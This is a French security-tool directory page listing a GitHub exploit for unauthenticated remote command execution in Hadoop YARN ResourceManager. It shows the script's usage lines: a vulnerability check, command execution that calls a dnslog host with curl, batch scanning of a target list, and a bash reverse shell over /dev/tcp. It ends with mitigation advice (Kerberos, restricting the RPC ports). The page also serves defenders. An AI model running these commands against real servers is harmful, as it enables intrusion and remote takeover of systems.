Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Hadoop-Yarn-ResourceManager-RCE — Hadoop Yan ResourceManager unauthorized RCE | Kitploit
Outils/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
3914il y a 4 ansVérifié par Kitploit

Impact de la vulnérabilité

Il existait une vulnérabilité d'accès non autorisé dans Hadoop Yarn ResourceManager. Cette vulnérabilité se trouvait dans Hadoop Yarn, le composant central de Hadoop. Étant donné que Hadoop Yarn exposait le service RPC au public par défaut, un attaquant distant pouvait tirer parti de cette vulnérabilité d'accès non autorisé et exécuter des commandes arbitraires via le service RPC, afin de contrôler le serveur cible. Compte tenu du haut niveau de risque et de la grande dangerosité de cette vulnérabilité, et du fait que ses détails ont déjà été divulgués et exploités par des attaquants, il est recommandé à tous les utilisateurs d'Apache Hadoop d'effectuer un auto-examen et de prendre des mesures de sécurité en temps utile.

Produit concerné

Apache Hadoop Yarn *

Vérification de la vulnérabilité

Utilisation de base

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

Vérification de la vulnérabilité

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

Exécution de commandes

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

Scan par lot

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Shell inversé

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Références

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Conseils de sécurité

1.Activez l'authentification Kerberos pour empêcher tout accès non autorisé.

root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>

2.Interdisez aux adresses externes d'accéder aux ports liés au service RPC de Hadoop, ou configurez-les pour qu'ils ne soient ouverts qu'aux adresses de confiance.

Déclaration solennelle : n'utilisez pas cet outil pour des opérations illégales. Cet outil est uniquement destiné à l'auto-vérification de sécurité par le personnel de la Partie A et de la Partie B. Si l'utilisateur l'utilise illégalement, la responsabilité légale incombera à l'utilisateur !!!

Télécharger l’outil